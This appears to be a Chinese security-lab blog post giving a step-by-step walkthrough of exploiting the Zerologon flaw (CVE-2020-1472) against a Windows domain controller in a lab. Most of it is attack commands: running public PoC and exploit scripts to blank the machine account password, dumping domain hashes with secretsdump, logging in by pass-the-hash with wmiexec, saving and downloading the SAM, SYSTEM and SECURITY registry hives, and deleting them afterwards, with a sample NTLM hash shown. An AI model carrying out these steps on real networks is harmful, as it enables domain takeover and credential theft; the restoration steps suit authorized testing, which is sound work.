原理及利用步骤
https://www.preempt.com/blog/security-advisory-zerologon-cve-2020-1472-an-unauthenticated-privilege-escalation-to-full-domain-privileges/
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hijacking-a-domain-controller-with-netlogon-rpc-aka-zerologon-cve-2020-1472/
影响版本:
Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server 2012Windows Server 2012 (Server Core installation)Windows Server 2012 R2Windows Server 2012 R2 (Server Core installation)Windows Server 2016Windows Server 2016 (Server Core installation)Windows Server 2019Windows Server 2019 (Server Core installation)Windows Server, version 1903 (Server Core installation)Windows Server, version 1909 (Server Core installation)Windows Server, version 2004 (Server Core installation)
环境描述:
域控: Windows Server 2008 R2 Standard
攻击机:kali-linux-2020.1 (不在域内,能连通域控
漏洞检测:
POC地址:
https://github.com/SecuraBV/CVE-2020-1472查询netbios名称:
linux:
nbtscan -v -h 192.168.1.56 Workstation Service选项的值
windows:
nbtstat -A 192.168.1.56检测:
python3 zerologon_tester.py dc-netbios-name dc-ip
漏洞利用:
exp地址:
https://github.com/dirkjanm/CVE-2020-1472python3 cve-2020-1472-exploit.py
坑点报错:
Unexpected error:module'impacket.dcerpc.v5.nrpc'has no attribute'NetrServerPasswordSet2'.
解决:需要卸载现有impacket套件,安装最新的impacket
卸载:
sudo apt remove --purge impacket-scripts python3-impacketsudo apt autoremove
安装:
git clone https://github.com/SecureAuthCorp/impacketcd impacketsudo pip isntall .sudo python3 setup.py install
密码置空,使用secretdump获取域控上的hash(这里置空的是域控所在机器的机器管理员密码,而非域控密码--->域控所在机器密码跟更改可能会影响与其他域的通信或者域控上的dns等功能)
./secretsdump.py 域名称/域控机器名称$@域控IP -just-dc -no-pass
环境恢复:
[方法1]
如上图,已获取域控Administrator的hash,使用该hash尝试获取机器hash即MACHINE.ACC中的
hash,plain_password_hex选项的值
./secretsdump.py pentest/administrator@192.168.1.56-hashes aad3b435b51404eeaad3b435b51404ee:4cb55ea6471d29ccbb2ce4cf00271fe3 -use-vss
恢复hashes
python3 restorepassword.py /@-target-ip-hexpass
secretdump验证:
[方法2]
有些情况不能获取到plain_password_hex,通过已获取的域控hash登录机器并dump sam文件到本地
./wmiexec.py pentest/[email protected]-hashes aad3b435b51404eeaad3b435b51404ee:4cb55ea6471d29ccbb2ce4cf00271fe3
导出并下载sam :
reg save HKLMSYSTEM system.savereg save HKLMSAM sam.savereg save HKLMSECURITY security.saveget system.saveget sam.saveget security.save
解析sam提取机器密码hex
./secretsdump.py -sam sam.save -system system.save-security security.save LOCAL
删除机器上的sam:
del /f system.savedel /f sam.savedel /f security.save
[方法3]
通过域管hash登录,执行下面命令重置机器密码
powershell Reset-ComputerMachinePassword
链接:
https://meterpreter.org/cve-2020-1472-netlogon-privilege-escalation-vulnerability-alert/
https://my.oschina.net/u/4587690/blog/4662834
https://github.com/dirkjanm/CVE-2020-1472
https://github.com/mstxq17/cve-2020-1472
end
我就知道你“在看”
本文始发于微信公众号(雷石安全实验室):Netlogon域控提权(CVE-2020-1472)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论